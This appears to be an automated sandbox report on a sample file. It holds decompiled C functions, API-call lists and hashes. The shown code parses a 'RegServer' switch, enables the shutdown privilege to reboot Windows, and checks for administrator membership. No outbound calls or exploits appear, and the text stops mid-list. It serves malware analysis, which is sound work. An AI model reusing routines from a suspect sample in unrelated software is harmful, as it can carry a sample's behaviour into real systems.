                                                                                                                                                                                                      0x00e75d64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d62
                                                                                                                                                                                                      0x00e75d5b
                                                                                                                                                                                                      0x00e75d4f
                                                                                                                                                                                                      0x00e75d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d9f
                                                                                                                                                                                                      0x00e75d9f
                                                                                                                                                                                                      0x00e75da5
                                                                                                                                                                                                      0x00e75dab
                                                                                                                                                                                                      0x00e75dba
                                                                                                                                                                                                      0x00e76218
                                                                                                                                                                                                      0x00e7621d
                                                                                                                                                                                                      0x00e76220
                                                                                                                                                                                                      0x00e76221
                                                                                                                                                                                                      0x00e76229
                                                                                                                                                                                                      0x00e76230
                                                                                                                                                                                                      0x00e76247
                                                                                                                                                                                                      0x00e7626a
                                                                                                                                                                                                      0x00e76272
                                                                                                                                                                                                      0x00e76249
                                                                                                                                                                                                      0x00e76255
                                                                                                                                                                                                      0x00e7625f
                                                                                                                                                                                                      0x00e76264
                                                                                                                                                                                                      0x00e76264
                                                                                                                                                                                                      0x00e76284
                                                                                                                                                                                                      0x00e75dc0
                                                                                                                                                                                                      0x00e75dc0
                                                                                                                                                                                                      0x00e75dca
                                                                                                                                                                                                      0x00e75e22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75dcc
                                                                                                                                                                                                      0x00e75dce
                                                                                                                                                                                                      0x00e75e24
                                                                                                                                                                                                      0x00e75e24
                                                                                                                                                                                                      0x00e75e2c
                                                                                                                                                                                                      0x00e75e47
                                                                                                                                                                                                      0x00e75e4a
                                                                                                                                                                                                      0x00e761d2
                                                                                                                                                                                                      0x00e761e2
                                                                                                                                                                                                      0x00e761e7
                                                                                                                                                                                                      0x00e761ee
                                                                                                                                                                                                      0x00e761f1
                                                                                                                                                                                                      0x00e761f1
                                                                                                                                                                                                      0x00e761f8
                                                                                                                                                                                                      0x00e761f8
                                                                                                                                                                                                      0x00e75e50
                                                                                                                                                                                                      0x00e75e53
                                                                                                                                                                                                      0x00e76109
                                                                                                                                                                                                      0x00e7611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76125
                                                                                                                                                                                                      0x00e76137
                                                                                                                                                                                                      0x00e7613a
                                                                                                                                                                                                      0x00e7613c
                                                                                                                                                                                                      0x00e7613e
                                                                                                                                                                                                      0x00e7613e
                                                                                                                                                                                                      0x00e76141
                                                                                                                                                                                                      0x00e76141
                                                                                                                                                                                                      0x00e76143
                                                                                                                                                                                                      0x00e76144
                                                                                                                                                                                                      0x00e7614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76150
                                                                                                                                                                                                      0x00e76152
                                                                                                                                                                                                      0x00e7615c
                                                                                                                                                                                                      0x00e76170
                                                                                                                                                                                                      0x00e76172
                                                                                                                                                                                                      0x00e7617c
                                                                                                                                                                                                      0x00e76190
                                                                                                                                                                                                      0x00e76190
                                                                                                                                                                                                      0x00e76196
                                                                                                                                                                                                      0x00e761a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e761ab
                                                                                                                                                                                                      0x00e761b9
                                                                                                                                                                                                      0x00e761c6
                                                                                                                                                                                                      0x00e761c6
                                                                                                                                                                                                      0x00e7617e
                                                                                                                                                                                                      0x00e76180
                                                                                                                                                                                                      0x00e7618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7618a
                                                                                                                                                                                                      0x00e7615e
                                                                                                                                                                                                      0x00e76160
                                                                                                                                                                                                      0x00e7616a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7616a
                                                                                                                                                                                                      0x00e7615c
                                                                                                                                                                                                      0x00e7614a
                                                                                                                                                                                                      0x00e7610b
                                                                                                                                                                                                      0x00e7610e
                                                                                                                                                                                                      0x00e7610e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e59
                                                                                                                                                                                                      0x00e75e59
                                                                                                                                                                                                      0x00e75e5c
                                                                                                                                                                                                      0x00e7604f
                                                                                                                                                                                                      0x00e76056
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7605c
                                                                                                                                                                                                      0x00e7606e
                                                                                                                                                                                                      0x00e76071
                                                                                                                                                                                                      0x00e76073
                                                                                                                                                                                                      0x00e76075
                                                                                                                                                                                                      0x00e76075
                                                                                                                                                                                                      0x00e76078
                                                                                                                                                                                                      0x00e76078
                                                                                                                                                                                                      0x00e7607a
                                                                                                                                                                                                      0x00e7607b
                                                                                                                                                                                                      0x00e76081
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76087
                                                                                                                                                                                                      0x00e76087
                                                                                                                                                                                                      0x00e7608d
                                                                                                                                                                                                      0x00e7609c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e760a2
                                                                                                                                                                                                      0x00e760aa
                                                                                                                                                                                                      0x00e760b2
                                                                                                                                                                                                      0x00e760b7
                                                                                                                                                                                                      0x00e760bd
                                                                                                                                                                                                      0x00e760bf
                                                                                                                                                                                                      0x00e760bf
                                                                                                                                                                                                      0x00e760d6
                                                                                                                                                                                                      0x00e760e0
                                                                                                                                                                                                      0x00e760e7
                                                                                                                                                                                                      0x00e760f5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e760f5
                                                                                                                                                                                                      0x00e7609c
                                                                                                                                                                                                      0x00e76081
                                                                                                                                                                                                      0x00e75e62
                                                                                                                                                                                                      0x00e75e62
                                                                                                                                                                                                      0x00e75e65
                                                                                                                                                                                                      0x00e75fd3
                                                                                                                                                                                                      0x00e75fe9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75fef
                                                                                                                                                                                                      0x00e75fef
                                                                                                                                                                                                      0x00e75ff7
                                                                                                                                                                                                      0x00e75ffd
                                                                                                                                                                                                      0x00e76003
                                                                                                                                                                                                      0x00e76006
                                                                                                                                                                                                      0x00e76011
                                                                                                                                                                                                      0x00e76014
                                                                                                                                                                                                      0x00e7603d
                                                                                                                                                                                                      0x00e76016
                                                                                                                                                                                                      0x00e76018
                                                                                                                                                                                                      0x00e76019
                                                                                                                                                                                                      0x00e7601b
                                                                                                                                                                                                      0x00e76033
                                                                                                                                                                                                      0x00e7601d
                                                                                                                                                                                                      0x00e76020
                                                                                                                                                                                                      0x00e76029
                                                                                                                                                                                                      0x00e76022
                                                                                                                                                                                                      0x00e76022
                                                                                                                                                                                                      0x00e76022
                                                                                                                                                                                                      0x00e76020
                                                                                                                                                                                                      0x00e7601b
                                                                                                                                                                                                      0x00e76042
                                                                                                                                                                                                      0x00e76044
                                                                                                                                                                                                      0x00e76046
                                                                                                                                                                                                      0x00e7604a
                                                                                                                                                                                                      0x00e75ff7
                                                                                                                                                                                                      0x00e75fd5
                                                                                                                                                                                                      0x00e75fd8
                                                                                                                                                                                                      0x00e75fd8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e6b
                                                                                                                                                                                                      0x00e75e6b
                                                                                                                                                                                                      0x00e75e6e
                                                                                                                                                                                                      0x00e75f8b
                                                                                                                                                                                                      0x00e75f99
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75f9f
                                                                                                                                                                                                      0x00e75fa7
                                                                                                                                                                                                      0x00e75faf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75fb1
                                                                                                                                                                                                      0x00e75fb3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75fb5
                                                                                                                                                                                                      0x00e75fb7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75fb9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75fb9
                                                                                                                                                                                                      0x00e75fb7
                                                                                                                                                                                                      0x00e75fb3
                                                                                                                                                                                                      0x00e75faf
                                                                                                                                                                                                      0x00e75f8d
                                                                                                                                                                                                      0x00e75f8d
                                                                                                                                                                                                      0x00e75f8d
                                                                                                                                                                                                      0x00e75f8f
                                                                                                                                                                                                      0x00e75fc1
                                                                                                                                                                                                      0x00e75fc1
                                                                                                                                                                                                      0x00e75fc1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e74
                                                                                                                                                                                                      0x00e75e74
                                                                                                                                                                                                      0x00e75e77
                                                                                                                                                                                                      0x00e75ea0
                                                                                                                                                                                                      0x00e75ebd
                                                                                                                                                                                                      0x00e75f79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75f7f
                                                                                                                                                                                                      0x00e75ec3
                                                                                                                                                                                                      0x00e75ec3
                                                                                                                                                                                                      0x00e75ecc
                                                                                                                                                                                                      0x00e75ed4
                                                                                                                                                                                                      0x00e75ed6
                                                                                                                                                                                                      0x00e75edc
                                                                                                                                                                                                      0x00e75edf
                                                                                                                                                                                                      0x00e75eea
                                                                                                                                                                                                      0x00e75eed
                                                                                                                                                                                                      0x00e75f3f
                                                                                                                                                                                                      0x00e75f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75eef
                                                                                                                                                                                                      0x00e75eef
                                                                                                                                                                                                      0x00e75ef2
                                                                                                                                                                                                      0x00e75f34
                                                                                                                                                                                                      0x00e75ef4
                                                                                                                                                                                                      0x00e75ef4
                                                                                                                                                                                                      0x00e75ef7
                                                                                                                                                                                                      0x00e75f2b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75ef9
                                                                                                                                                                                                      0x00e75ef9
                                                                                                                                                                                                      0x00e75efc
                                                                                                                                                                                                      0x00e75f22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75efe
                                                                                                                                                                                                      0x00e75eff
                                                                                                                                                                                                      0x00e75f02
                                                                                                                                                                                                      0x00e75f16
                                                                                                                                                                                                      0x00e75f04
                                                                                                                                                                                                      0x00e75f07
                                                                                                                                                                                                      0x00e75f0d
                                                                                                                                                                                                      0x00e75f46
                                                                                                                                                                                                      0x00e75f46
                                                                                                                                                                                                      0x00e75f09
                                                                                                                                                                                                      0x00e75f09
                                                                                                                                                                                                      0x00e75f09
                                                                                                                                                                                                      0x00e75f07
                                                                                                                                                                                                      0x00e75f02
                                                                                                                                                                                                      0x00e75efc
                                                                                                                                                                                                      0x00e75ef7
                                                                                                                                                                                                      0x00e75ef2
                                                                                                                                                                                                      0x00e75f4c
                                                                                                                                                                                                      0x00e75f4e
                                                                                                                                                                                                      0x00e75f50
                                                                                                                                                                                                      0x00e75f54
                                                                                                                                                                                                      0x00e75ed4
                                                                                                                                                                                                      0x00e75ea2
                                                                                                                                                                                                      0x00e75ea4
                                                                                                                                                                                                      0x00e75eaf
                                                                                                                                                                                                      0x00e75eaf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e79
                                                                                                                                                                                                      0x00e75e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e83
                                                                                                                                                                                                      0x00e75e83
                                                                                                                                                                                                      0x00e75e83
                                                                                                                                                                                                      0x00e75e85
                                                                                                                                                                                                      0x00e75e85
                                                                                                                                                                                                      0x00e75e8e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75e94
                                                                                                                                                                                                      0x00e75e8e
                                                                                                                                                                                                      0x00e75e7d
                                                                                                                                                                                                      0x00e75e77
                                                                                                                                                                                                      0x00e75e6e
                                                                                                                                                                                                      0x00e75e65
                                                                                                                                                                                                      0x00e75e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75dd0
                                                                                                                                                                                                      0x00e75dce
                                                                                                                                                                                                      0x00e75dca
                                                                                                                                                                                                      0x00e75dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d00
                                                                                                                                                                                                      0x00e75dd9
                                                                                                                                                                                                      0x00e75e04
                                                                                                                                                                                                      0x00e761fe
                                                                                                                                                                                                      0x00e75e0a
                                                                                                                                                                                                      0x00e75e0c
                                                                                                                                                                                                      0x00e75e17
                                                                                                                                                                                                      0x00e75e17
                                                                                                                                                                                                      0x00e75e04
                                                                                                                                                                                                      0x00e76200
                                                                                                                                                                                                      0x00e76200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00E75CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00E78B3E,00000104,00000000,?,?), ref: 00E75DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00E75E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 00E75EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00E75F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00E75FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 00E76008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00E760AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00E71140,00000000,00000040,00000000), ref: 00E761F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00E761F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 42e3252d6d24b26d870a9d2f4060668bd374d09ddff58864155ba97adebfb6c5
                                                                                                                                                                                                      • Instruction ID: a3ab6594d243a367cb0a9805326a9e50153defb195457023e25908d6428c2c76
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42e3252d6d24b26d870a9d2f4060668bd374d09ddff58864155ba97adebfb6c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79D10872A44E455EDB35CB398C487FA7BA19B5630CF54F0AAC48EB6191D7F04EC68B01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E00E71F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0xe79a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E00E744B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E00E76CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E00E744B9(0, 0x522, 0xe71140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E00E71EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x00e71f90
                                                                                                                                                                                                      0x00e71f90
                                                                                                                                                                                                      0x00e71f93
                                                                                                                                                                                                      0x00e71f98
                                                                                                                                                                                                      0x00e71fa4
                                                                                                                                                                                                      0x00e71fa7
                                                                                                                                                                                                      0x00e71fc5
                                                                                                                                                                                                      0x00e71fcd
                                                                                                                                                                                                      0x00e71fdb
                                                                                                                                                                                                      0x00e71ee5
                                                                                                                                                                                                      0x00e71eea
                                                                                                                                                                                                      0x00e71ef1
                                                                                                                                                                                                      0x00e71ef4
                                                                                                                                                                                                      0x00e71f0c
                                                                                                                                                                                                      0x00e71f2e
                                                                                                                                                                                                      0x00e71f3a
                                                                                                                                                                                                      0x00e71f46
                                                                                                                                                                                                      0x00e71f4d
                                                                                                                                                                                                      0x00e71f58
                                                                                                                                                                                                      0x00e71f60
                                                                                                                                                                                                      0x00e71f61
                                                                                                                                                                                                      0x00e71f62
                                                                                                                                                                                                      0x00e71f75
                                                                                                                                                                                                      0x00e71f80
                                                                                                                                                                                                      0x00e71f77
                                                                                                                                                                                                      0x00e71f77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71f77
                                                                                                                                                                                                      0x00e71f64
                                                                                                                                                                                                      0x00e71f64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71f64
                                                                                                                                                                                                      0x00e71f0e
                                                                                                                                                                                                      0x00e71f0e
                                                                                                                                                                                                      0x00e71f13
                                                                                                                                                                                                      0x00e71f13
                                                                                                                                                                                                      0x00e71f14
                                                                                                                                                                                                      0x00e71f14
                                                                                                                                                                                                      0x00e71f16
                                                                                                                                                                                                      0x00e71f17
                                                                                                                                                                                                      0x00e71f1a
                                                                                                                                                                                                      0x00e71f1f
                                                                                                                                                                                                      0x00e71f1f
                                                                                                                                                                                                      0x00e71f86
                                                                                                                                                                                                      0x00e71f8f
                                                                                                                                                                                                      0x00e71fcf
                                                                                                                                                                                                      0x00e71fd3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71fd3
                                                                                                                                                                                                      0x00e71fa9
                                                                                                                                                                                                      0x00e71fb4
                                                                                                                                                                                                      0x00e71fbb
                                                                                                                                                                                                      0x00e71fc3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71fc3
                                                                                                                                                                                                      0x00e71f9a
                                                                                                                                                                                                      0x00e71f9a
                                                                                                                                                                                                      0x00e71fa2
                                                                                                                                                                                                      0x00e71fd9
                                                                                                                                                                                                      0x00e71fda
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71fa2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00E71EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E71F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00E71FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 645af60ed1dbc00c233f724c46432b5861acc906c2c50dac75aa6dc0d820eb94
                                                                                                                                                                                                      • Instruction ID: ac2b2f468cf4af6171e4622bc5c99e27e87c75ed61326ffe97679bdb48ed7fcc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 645af60ed1dbc00c233f724c46432b5861acc906c2c50dac75aa6dc0d820eb94
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D210AB1B403056BEB209BAA9C0AFBF77B8EFC5714F149068FA0DF6080D77488459261
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E00E717EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0xe7a288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00e717f6
                                                                                                                                                                                                      0x00e717fd
                                                                                                                                                                                                      0x00e71805
                                                                                                                                                                                                      0x00e7180b
                                                                                                                                                                                                      0x00e7180d
                                                                                                                                                                                                      0x00e71815
                                                                                                                                                                                                      0x00e71818
                                                                                                                                                                                                      0x00e71820
                                                                                                                                                                                                      0x00e71824
                                                                                                                                                                                                      0x00e7182c
                                                                                                                                                                                                      0x00e71832
                                                                                                                                                                                                      0x00e71837
                                                                                                                                                                                                      0x00e71851
                                                                                                                                                                                                      0x00e71854
                                                                                                                                                                                                      0x00e7185d
                                                                                                                                                                                                      0x00e71862
                                                                                                                                                                                                      0x00e7186c
                                                                                                                                                                                                      0x00e71872
                                                                                                                                                                                                      0x00e71877
                                                                                                                                                                                                      0x00e7187e
                                                                                                                                                                                                      0x00e7187e
                                                                                                                                                                                                      0x00e71883
                                                                                                                                                                                                      0x00e71883
                                                                                                                                                                                                      0x00e7185d
                                                                                                                                                                                                      0x00e7188a
                                                                                                                                                                                                      0x00e7188a
                                                                                                                                                                                                      0x00e718a2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E718DD), ref: 00E7181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E7182C
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00E718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E718DD), ref: 00E71855
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,00E718DD), ref: 00E71883
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E718DD), ref: 00E7188A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
